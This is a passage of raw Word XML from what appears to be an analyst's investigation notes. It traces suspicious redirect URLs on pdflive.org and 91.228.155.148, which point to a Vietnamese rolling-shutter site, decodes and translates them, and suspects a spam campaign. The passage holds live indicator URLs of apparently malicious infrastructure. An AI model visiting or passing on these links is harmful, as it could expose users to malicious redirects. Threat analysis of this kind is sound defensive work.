      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>https://pdflive.org/vPrCBJ?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=&amp;landing_url=cuacuoncaocap.biz%2F&amp;name=_LVFCQ2FZ4DJ3v9Vd&amp;host=https%3A%2F%2Fpdflive.org%2FvPrCBJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D282C" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="5400"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B1001" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00067395" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00FA1767">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="18BC9C"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>91.228.155.148</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7771BF1E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="8100"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BDCA0C" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>http://91.228.155.148/vgQC69?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=C%E1%BB%ACA%20CU%E1%BB%90N%20CAO%20C%E1%BA%A4P%20%E2%80%93%20Thi%20c%C3%B4ng%20s%E1%BB%ADa%20ch%E1%BB%AFa%20c%E1%BB%ADa%20cu%E1%BB%91n%20cao%20c%E1%BA%A5p&amp;landing_url=cuacuoncaocap.biz%2F&amp;name=_VxBnPXFnzvmdYjbq&amp;host=http%3A%2F%2F91.228.155.148%2FvgQC69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E744E" w14:textId="48FD1AC8" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="30F93E21" w14:textId="64D138CD" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="497CEEE2" w14:textId="3B853018" w:rsidR="00FA1767" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00FA1767" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26E8B37B" w14:textId="1F68755C" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="056B09AA" w14:textId="765E7DEB" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="2211A54C" w14:textId="40280E33" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB59DCE" wp14:editId="6CD6C04F">
            <wp:extent cx="5943600" cy="3544570"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="11430"/>
            <wp:docPr id="23" name="Picture 23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Graphical user interface, text, application, email&#10;&#10;Description automatically generated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4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3EF625" w14:textId="2F75C707" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="54612C5C" w14:textId="3B4E08C6" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r w:rsidRPr="00FA1767">
        <w:t>https://pdflive.org/vPrCBJ?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=&amp;landing_url=cuacuoncaocap.biz/&amp;name=_LVFCQ2FZ4DJ3v9Vd&amp;host=https://pdflive.org/vPrCBJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49F625" w14:textId="5B732200" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="3D6FA323" w14:textId="37048FE6" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4511461E" wp14:editId="7039750B">
            <wp:extent cx="5943600" cy="3721735"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12065"/>
            <wp:docPr id="22" name="Picture 22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Graphical user interface, text, application, email&#10;&#10;Description automatically generated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217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5CD104" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="1267B992" w14:textId="5DFD22A0" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r w:rsidRPr="00FA1767">
        <w:t>http://91.228.155.148/vgQC69?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=CỬA CUỐN CAO CẤP – Thi công sửa chữa cửa cuốn cao cấp&amp;landing_url=cuacuoncaocap.biz/&amp;name=_VxBnPXFnzvmdYjbq&amp;host=http://91.228.155.148/vgQC69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD1C19" w14:textId="711BAA52" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="4D61F151" w14:textId="1EC1EB2C" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t>-------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77283F90" w14:textId="1067B8C6" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="762849D6" w14:textId="5FA89882" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t xml:space="preserve">It seems that this is a foreign language.  We can translate it.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4463D" w14:textId="3A2778E3" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="17557781" w14:textId="3A5B4486" w:rsidR="00FA1767" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00FA1767" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://translate.google.com/?sl=auto&amp;tl=en&amp;text=http%3A%2F%2F91.228.155.148%2FvgQC69%3Freturn%3Djs.client%26%26se_referrer%3D%26default_keyword%3DC%E1%BB%ACA%20CU%E1%BB%90N%20CAO%20C%E1%BA%A4P%20%E2%80%93%20Thi%20c%C3%B4ng%20s%E1%BB%ADa%20ch%E1%BB%AFa%20c%E1%BB%ADa%20cu%E1%BB%91n%20cao%20c%E1%BA%A5p%26landing_url%3Dcuacuoncaocap.biz%2F%26name%3D_VxBnPXFnzvmdYjbq%26host%3Dhttp%3A%2F%2F91.228.155.148%2FvgQC69&amp;op=translate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58813D3E" w14:textId="5A609794" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="46A3ECDF" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="6EDEA45D" w14:textId="6D916C1F" w:rsidR="00FA1767" w:rsidRDefault="002F6284">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEDE3B5" wp14:editId="0944FBCC">
            <wp:extent cx="5943600" cy="2272665"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="13335"/>
            <wp:docPr id="24" name="Picture 24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Graphical user interface, text, application, email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26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745852" w14:textId="0CF412F1" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="33181815" w14:textId="3110B7AD" w:rsidR="002F6284" w:rsidRDefault="002F6284">
      <w:r w:rsidRPr="002F6284">
        <w:t>http://91.228.155.148/vgQC69?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=PREMIUM WINDOW – Construction and repair of premium rolling shutters&amp;landing_url=cuacuoncaocap.biz/&amp;name=_VxBnPXFnzvmd=http://91bq&amp;host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ED62E" w14:textId="4B90BCAA" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="0AA29D81" w14:textId="1B8105E1" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="3FCB3C11" w14:textId="77777777" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="0A875BC8" w14:textId="1B579B47" w:rsidR="002F6284" w:rsidRDefault="002F6284">
      <w:r>
        <w:t xml:space="preserve">We can now tell this is Vietnamese and is referring to </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6284">
        <w:t>PREMIUM WINDOW – Construction and repair of premium rolling shutters</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AECC059" w14:textId="379BC9BC" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="6E96FBFF" w14:textId="02BECA3C" w:rsidR="002F6284" w:rsidRDefault="002F6284">
      <w:r>
        <w:t>This can potentially be related to some kind of spam campaign selling windows and rolling shutters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C611B5D" w14:textId="6463A823" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="5E36201A" w14:textId="77777777" w:rsidR="002F6284" w:rsidRDefault="002F6284"/>
    <w:p w14:paraId="23375F52" w14:textId="1E50A535" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="16DEA29F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:sectPr w:rsidR="00FA1767" w:rsidSect="00B20C4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Lato">
    <w:panose1 w:val="020B0604020202020204"/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8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393"/>
    <w:rsid w:val="00067395"/>
    <w:rsid w:val="000D4640"/>
    <w:rsid w:val="00200E01"/>
    <w:rsid w:val="00214067"/>
    <w:rsid w:val="002F6284"/>
    <w:rsid w:val="003F0BF7"/>
    <w:rsid w:val="005350C2"/>
    <w:rsid w:val="006939C3"/>
    <w:rsid w:val="00940393"/>
    <w:rsid w:val="00A9388A"/>
    <w:rsid w:val="00AF0E66"/>
    <w:rsid w:val="00B20C49"/>
    <w:rsid w:val="00BE2D6D"/>
    <w:rsid w:val="00FA1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50AA003"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5D4EE0D9-30BB-4941-9288-F633BC67A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4039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40393"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD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40393"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman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4039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idden-sm">
    <w:name w:val="hidden-sm"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A938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6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4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1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9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rlscan.io/result/a9c6d374-6292-4300-bd66-6e072b72b372/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image" Target="media/image18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/90c5c13e-40ce-4700-ae98-259418dda903/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/17d64db1-5f88-4aa0-a97f-a4c6a491939f/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://translate.google.com/?sl=auto&amp;tl=en&amp;text=http%3A%2F%2F91.228.155.148%2FvgQC69%3Freturn%3Djs.client%26%26se_referrer%3D%26default_keyword%3DC%E1%BB%ACA%20CU%E1%BB%90N%20CAO%20C%E1%BA%A4P%20%E2%80%93%20Thi%20c%C3%B4ng%20s%E1%BB%ADa%20ch%E1%BB%AFa%20c%E1%BB%ADa%20cu%E1%BB%91n%20cao%20c%E1%BA%A5p%26landing_url%3Dcuacuoncaocap.biz%2F%26name%3D_VxBnPXFnzvmdYjbq%26host%3Dhttp%3A%2F%2F91.228.155.148%2FvgQC69&amp;op=translate" TargetMode="Externa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hyperlink" Target="https://beautifier.io/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/a9c6d374-6292-4300-bd66-6e072b72b372/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/responses/99fd73bb8f87a4ffa338c76244391f604f77a8343019a4fb666d50adb1d87be9/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://beautifier.io/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/17d64db1-5f88-4aa0-a97f-a4c6a491939f/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/domain/pdflive.org" TargetMode="External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image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.riskiq.com/search/91.228.155.148/hostpairs" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/search/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/MBThreatIntel/status/1439995792693944324" TargetMode="Externa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hyperlink" Target="https://urlscan.io/responses/99fd73bb8f87a4ffa338c76244391f604f77a8343019a4fb666d50adb1d87be9/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.riskiq.com/search/todosobretenis.com/hostpairs" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png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hyperlink" Target="https://www.base64decode.org/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/ba54e49a-1a3b-4b3d-872a-c07d72f68ab6/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/domain/91.228.155.148" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId41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hyperlink" Target="https://community.riskiq.com/search/todosobretenis.com" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/responses/9142eddd4c17e8b05d9c7aedbd33fdf196496b6f72459a42ace9ae1b4fabdf4f/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/search/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/result/a5420f92-489f-4922-903d-f54fb8410cc3/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId4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89</Pages>
  <Words>75740</Words>
  <Characters>431719</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3597</Lines>
  <Paragraphs>1012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benjamin powell</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>benjamin powell</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-21T21:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-30T04:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>